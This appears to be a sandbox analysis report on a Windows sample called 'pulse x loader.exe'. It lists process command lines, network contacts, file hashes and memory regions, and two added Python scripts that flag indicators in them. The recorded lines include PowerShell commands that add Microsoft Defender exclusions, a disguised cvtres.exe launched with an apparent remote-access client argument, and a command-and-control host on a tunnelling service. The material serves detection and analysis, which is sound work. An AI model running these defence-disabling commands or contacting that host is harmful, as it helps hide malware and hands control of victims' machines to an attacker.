C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gyuvwgk2\gyuvwgk2.cmdline"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75E2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE6D2D4D6A420418CAAC7B750473A74E4.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lofq2i40\lofq2i40.cmdline"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87F3.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF909CFD095CE404E8CB41272ECECD285.TMP"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
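Added example (not part of this report, and not code from the sandbox vendor): a small Python triage script that runs over process command lines such as the ones listed above and flags the four patterns the list shows: a Defender exclusion added with Add-MpPreference -ExclusionPath, cvtres.exe started with arguments other than the /NOLOGO ... /OUT: form it receives when csc.exe drives it as a resource converter, certutil -hashfile used as a hashing tool, and csc.exe compiling a response file from the user's Temp directory. The rule names, the regular expressions and the absolute/relative distinction for the excluded path are my own; the sample command lines are copied from the process list above.

```python
"""Added example (not part of the sandbox report): flag the command-line
patterns visible in the process list above."""
import re
from typing import NamedTuple


class Finding(NamedTuple):
    rule: str      # rule name (my own naming)
    detail: str    # fragment that justifies the hit
    cmdline: str   # full command line that triggered it


# Patterns derived from the command lines in the report's process list.
# Defender exclusion added from the command line; capture the excluded path.
RE_MP_EXCLUSION = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+([^\s&]+)", re.I)
# Image is cvtres.exe (quoted or bare path); capture everything after it.
RE_CVTRES_IMAGE = re.compile(r'^"?(?:[A-Za-z]:\\[^"]*\\)?cvtres\.exe"?\s*(.*)$', re.I)
# Argument shape cvtres.exe receives when csc.exe drives it as a resource converter.
RE_CVTRES_LEGIT = re.compile(r'^/NOLOGO\b.*"?/OUT:', re.I)
# certutil used as a hashing tool (often piped through find to drop banner lines).
RE_CERTUTIL_HASH = re.compile(r"\bcertutil(?:\.exe)?\b.*\s-hashfile\s", re.I)
# csc.exe compiling a response file that lives under the user's Temp directory.
RE_CSC_TEMP = re.compile(r'csc\.exe"?\s.*@"?[^"]*\\AppData\\Local\\Temp\\[^"]*\.cmdline', re.I)


def inspect(cmdline: str) -> list[Finding]:
    """Return every rule hit for one process command line (empty list = clean)."""
    hits: list[Finding] = []

    m = RE_MP_EXCLUSION.search(cmdline)
    if m:
        path = m.group(1)
        kind = "absolute" if re.match(r"^[A-Za-z]:\\", path) else "relative"
        hits.append(Finding("defender_exclusion_added", f"{kind} path {path}", cmdline))

    m = RE_CVTRES_IMAGE.match(cmdline)
    if m and not RE_CVTRES_LEGIT.match(m.group(1)):
        hits.append(Finding("cvtres_unexpected_args", m.group(1), cmdline))

    if RE_CERTUTIL_HASH.search(cmdline):
        hits.append(Finding("certutil_hashfile", "certutil -hashfile", cmdline))

    if RE_CSC_TEMP.search(cmdline):
        hits.append(Finding("csc_compile_from_temp", "response file under Temp", cmdline))

    return hits


def scan(cmdlines) -> list[Finding]:
    """Run inspect() over many command lines and collect every finding."""
    return [hit for line in cmdlines for hit in inspect(line)]


# Sample input: command lines copied from the process list above.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2BAA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F34258A595A44A299E8D14E911FF6CB.TMP"',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM',
    r'C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agun3vry\agun3vry.cmdline"',
    r'"C:\Windows\explorer.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f.rule:26} {f.detail}")
```

Run as a script it prints one line per finding; on a real host the same patterns map onto Sysmon Event ID 1 or EDR process-creation telemetry, where the parent process (csc.exe for the legitimate cvtres.exe case) is a second signal the command line alone does not carry.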
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| N/A | 127.0.0.1:59948 | | tcp |
| N/A | 127.0.0.1:59950 | | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
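Added example (not part of this report): a Python parser for the Network table above that collapses the repeated rows into unique destination/domain/protocol tuples with hit counts and sorts them into buckets an analyst would triage differently: reverse (PTR) lookups and forward DNS queries to the resolver, loopback sockets, third-party services the sample uses, bare IPs with no domain, and whatever is left as candidate C2. The service descriptions (keyauth.win as the KeyAuth licensing API, x2.c.lencr.org as Let's Encrypt revocation data, ipinfo.io as an external-IP lookup) and the reading of case-shield.gl.at.ply.gg as a playit.gg tunnel hostname are my identifications, not statements the report makes; the bucket names are mine too. The sample rows are copied from the table; two of them are kept in the form the extraction produced, with the Domain cell empty and the proto token shifted left, and the parser normalises that.

```python
"""Added example (not part of the sandbox report): collapse the Network table
above into unique endpoints and sort them into triage buckets."""
import re
from collections import Counter
from typing import NamedTuple


class Endpoint(NamedTuple):
    destination: str   # ip:port
    domain: str        # resolved name, or "" when the row carried none
    proto: str


# One table row: | Country | Destination | Domain | Proto |
ROW = re.compile(
    r"^\|\s*(?P<country>[^|]*?)\s*\|\s*(?P<dest>[^|]*?)\s*\|"
    r"\s*(?P<domain>[^|]*?)\s*\|\s*(?P<proto>[^|]*?)\s*\|$"
)

# Shared services seen in the table; the descriptions are my identification,
# not something the report states.
KNOWN_SERVICES = {
    "keyauth.win": "KeyAuth licensing/authentication API",
    "raw.githubusercontent.com": "GitHub raw file hosting",
    "ipinfo.io": "external IP address lookup",
    "x2.c.lencr.org": "Let's Encrypt certificate revocation data",
}


def parse(table: str) -> list[Endpoint]:
    """Parse markdown-style rows, skip the header, and repair rows whose Domain
    cell is empty and whose proto token slid into the Domain column."""
    endpoints = []
    for line in table.splitlines():
        m = ROW.match(line.strip())
        if not m or m["dest"].lower() == "destination":
            continue
        domain, proto = m["domain"], m["proto"]
        if domain.lower() in ("tcp", "udp") and not proto:
            domain, proto = "", domain
        endpoints.append(Endpoint(m["dest"], domain, proto.lower()))
    return endpoints


def classify(ep: Endpoint) -> str:
    """Bucket names are my own; the order matters (most specific test first)."""
    ip, _, port = ep.destination.rpartition(":")
    if ip == "127.0.0.1":
        return "loopback"
    if ep.domain.endswith(".in-addr.arpa"):
        return "ptr_lookup"           # reverse lookup of an IP the sandbox talked to
    if port == "53":
        return "dns_query"            # forward resolution, not a data channel
    if ep.domain in KNOWN_SERVICES:
        return "third_party_service"  # shared infrastructure: record, do not block as C2
    if not ep.domain:
        return "unresolved_ip"        # bare IP, needs enrichment before judgement
    return "candidate_c2"             # everything else, e.g. a tunnel host on a high port


def triage(table: str) -> dict[str, list[tuple[Endpoint, int]]]:
    """Return {bucket: [(endpoint, hit_count), ...]}, busiest endpoints first."""
    buckets: dict[str, list[tuple[Endpoint, int]]] = {}
    for ep, n in Counter(parse(table)).most_common():
        buckets.setdefault(classify(ep), []).append((ep, n))
    return buckets


# Sample input: rows copied from the Network table above (a representative subset).
SAMPLE_ROWS = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| NL | 52.142.223.178:80 | tcp | |
| N/A | 127.0.0.1:59948 | tcp | |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
"""

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_ROWS).items():
        print(bucket)
        for ep, n in items:
            print(f"  {n:3}x {ep.destination:24} {ep.domain or '-':30} {ep.proto}")
```

On the full table the candidate_c2 bucket reduces to the single 147.185.221.17:26501 endpoint behind case-shield.gl.at.ply.gg, which is the one worth treating as a network IOC; the third_party_service hosts are still worth recording as observed activity, but they are shared infrastructure and blocking them as C2 would be wrong.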
Files
memory/3248-0-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/3248-1-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/3248-2-0x00000000015D0000-0x00000000015E0000-memory.dmp
memory/3248-3-0x00000000015D0000-0x00000000015E0000-memory.dmp
memory/3092-5-0x0000000000400000-0x00000000007AD000-memory.dmp
memory/3092-7-0x0000000000400000-0x00000000007AD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 0fe1dcb894cdc7606af0793be745f08e |
| SHA1 | 672d6547d14f6e877f8593b3cd82b4398335836d |
| SHA256 | 7ac257cc76b68ee73b3f10a84f4042895fffb296edc7bf97a4a62679ae67ca5e |
| SHA512 | 8b9b4481b656854cb14dcb38bf12735cc774b7b75e94d8faf4f79f9b507f59bf04d44d93dd47f519bd5bb04744e3add9eb45f78e0984c273e2d7e1e1b74f4a45 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 09e0841a5385e8117623e65f9d78386c |
| SHA1 | 430a00a863b54af0f041c1b65c8d89e9a924b10c |
| SHA256 | 45b2e91ebc34e4d0e0baac023e1dfb3934aa1d470182b1760667e078803cc5be |
| SHA512 | 4c39a271d7b8aa7703c33e2edd1a122f5ec030ad185b447db957a264739d1af060f16749963c8acb48bb97fb8c315b2619d51c6009666ecd30239179c892cccb |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | ea8e1ce483e4e12e1c724c358d9754b3 |
| SHA1 | 5a983157b0777fba0003b2953252dba7774fce75 |
| SHA256 | 5ce1777e4fb657ba90f38c84388751d2124c36dd44acff286a7cb68657a7f53d |
| SHA512 | 3a94a6df2aba3eb0cd2c2022ae1e004df485c218021be9aed55da052197d0432d2e3f65020b0936418164c1afceb4056e9f85f285c28013490b6b3594153e35b |
memory/1716-25-0x00007FF766B60000-0x00007FF766F9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 67aba4afa4a8f3b16dcedf6e1ddc2b29 |
| SHA1 | 6086a00dc0d49b420a4d66e052ab740893e6b1be |
| SHA256 | c69aa87aa8901584f7fc2f4108f47990a186c7a5ac806894b6c42082bbba1cef |
| SHA512 | daea8d2d047b877575a2ea61872268ab5f15a961b89675957325bd5d631195e152363b6e9094cc2729e5713d76fa2e254590a0e30fb452911e08f4000ecc8fe8 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ecff2ff512f471b5fc8fd643bd566c95 |
| SHA1 | 06e873b7720cba2ce940ab6fb3fff4b023a31880 |
| SHA256 | 257814787f61f2c5301c4e4dd927480ffed19d37982d567ef43eae699e9a100e |
| SHA512 | 26d04a8de310bc74221b144667f4e871d05795b36d1e628ba9126394352b20fd1ddf6e707e093b4eb10c962afb2902ba4dabebeb013a401d8072e1012590d7f9 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
memory/464-28-0x0000000000B70000-0x0000000000BF2000-memory.dmp
memory/464-29-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/464-30-0x0000000005450000-0x00000000054EC000-memory.dmp
memory/464-31-0x00000000054F0000-0x0000000005582000-memory.dmp
memory/464-33-0x0000000005620000-0x0000000005630000-memory.dmp
memory/464-34-0x0000000006FF0000-0x0000000007594000-memory.dmp
memory/3248-32-0x0000000074E60000-0x0000000075411000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\as2cyhgw\as2cyhgw.cmdline
| MD5 | 3f5adfd00dfde4cc756d102dcfd15134 |
| SHA1 | 89eea4ca62bdb9fbf6a9c208463f97c2b67582dc |
| SHA256 | 05bc9fd6bafc6c779da987087212b57c642e07cf29b65027358f9eb7ff97cb08 |
| SHA512 | 2dac79ea90475987df0fd513407f9af19de5b40ffdf5d6ca340cbd3ec817107232d92fd54842e6744f8b93be1d818730c37381fdac265e409fd6677380f97037 |
\??\c:\Users\Admin\AppData\Local\Temp\as2cyhgw\as2cyhgw.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCF986C6C26C944EEA912369597B75CD5.TMP
| MD5 | 1d5543c367c49b9dd6366270fdd4ee3a |
| SHA1 | bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66 |
| SHA256 | 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2 |
| SHA512 | 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04 |
C:\Users\Admin\AppData\Local\Temp\RES5ED9.tmp
| MD5 | f0f21b4c8078698feadb914d38fa3235 |
| SHA1 | 9c2682f302bb4057b73b83148a71cba6c378b5f3 |
| SHA256 | 308df682a0c4487d0211ba6ce5ccc1d8fed725f521c71ed2e10e37e8d6335f12 |
| SHA512 | 5ece94bf38e3bf4a8257244008b5f6f844dfe9fff87684f728d350f3a106c3f3b0fe7d7350aeec33db91c7edd062acf13e8ee96c71d5216c50160820636f8d5f |
memory/2120-47-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2120-48-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/3248-49-0x00000000015D0000-0x00000000015E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
| MD5 | 37c4ead7d1c4f0ac019fd8180caeb415 |
| SHA1 | 0cd7ac77b91cd2e4997b5f4354b8471a9f31a112 |
| SHA256 | d6b414b37504c7df02be26b64e812190e7480a16c3d5f902ecea6f7f592b2261 |
| SHA512 | 49c56781cbd0f24f5803183176457f9c6123f23f05f00a12d46ebea5a8a661b6c4d69185b65c2a90311fa77a5b20237c00503b2253aeebfe2c6b3847f572ed50 |
memory/3268-53-0x0000000000BC0000-0x0000000000BC8000-memory.dmp
memory/3448-56-0x0000000002CB0000-0x0000000002CE6000-memory.dmp
memory/464-58-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/3248-59-0x00000000015D0000-0x00000000015E0000-memory.dmp
memory/3448-60-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/3448-61-0x0000000002C60000-0x0000000002C70000-memory.dmp
memory/828-57-0x00000000059B0000-0x0000000005FD8000-memory.dmp
memory/3268-54-0x00007FFF0AAB0000-0x00007FFF0B571000-memory.dmp
memory/828-62-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/828-63-0x0000000005370000-0x0000000005380000-memory.dmp
memory/3448-64-0x0000000002C60000-0x0000000002C70000-memory.dmp
memory/3448-65-0x0000000005B30000-0x0000000005B52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vvejlek1.r3v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3448-81-0x0000000005C40000-0x0000000005CA6000-memory.dmp
memory/828-77-0x0000000006330000-0x0000000006396000-memory.dmp
memory/828-88-0x0000000006470000-0x00000000067C4000-memory.dmp
memory/3268-89-0x000000001B970000-0x000000001B980000-memory.dmp
memory/3448-90-0x0000000006280000-0x000000000629E000-memory.dmp
memory/3448-91-0x00000000067E0000-0x000000000682C000-memory.dmp
memory/3448-106-0x000000006D8E0000-0x000000006D92C000-memory.dmp
memory/3448-105-0x000000007F3C0000-0x000000007F3D0000-memory.dmp
memory/1716-96-0x00007FF766B60000-0x00007FF766F9C000-memory.dmp
memory/3448-95-0x0000000006830000-0x0000000006862000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 788a689a5a2dff6ba136c3c05ccdf2ff |
| SHA1 | 2136a8c5a08eeec1860c9fa3d71a88f9127d6f8b |
| SHA256 | 094a057534816e710d9acf46cb4abf0d1983c43daeded7d1ffe563dc634ab6aa |
| SHA512 | c7afce12d1e2c20d9b2defdb0eb3d6934abe3911f16a1e7dc3585d4f1cc4caa8e2e9c1fa2091720afadb9289780db0573cf9309b53031d1e0a3f110e1b687ee4 |
memory/2300-119-0x00007FF766B60000-0x00007FF766F9C000-memory.dmp
memory/3448-122-0x0000000007520000-0x00000000075C3000-memory.dmp
memory/828-123-0x000000007F580000-0x000000007F590000-memory.dmp
memory/828-134-0x0000000005370000-0x0000000005380000-memory.dmp
memory/3448-133-0x0000000002C60000-0x0000000002C70000-memory.dmp
memory/2120-135-0x0000000071F80000-0x0000000072730000-memory.dmp
memory/3448-136-0x0000000007C50000-0x00000000082CA000-memory.dmp
memory/3448-137-0x00000000072F0000-0x000000000730A000-memory.dmp
memory/3448-117-0x00000000067A0000-0x00000000067BE000-memory.dmp
memory/828-120-0x000000006D8E0000-0x000000006D92C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tesetey.exe.log
| MD5 | 9a13b9031877b88c944f59d051765068 |
| SHA1 | a1dd0e7ad4778966bfd6f9c5112bb25819794f30 |
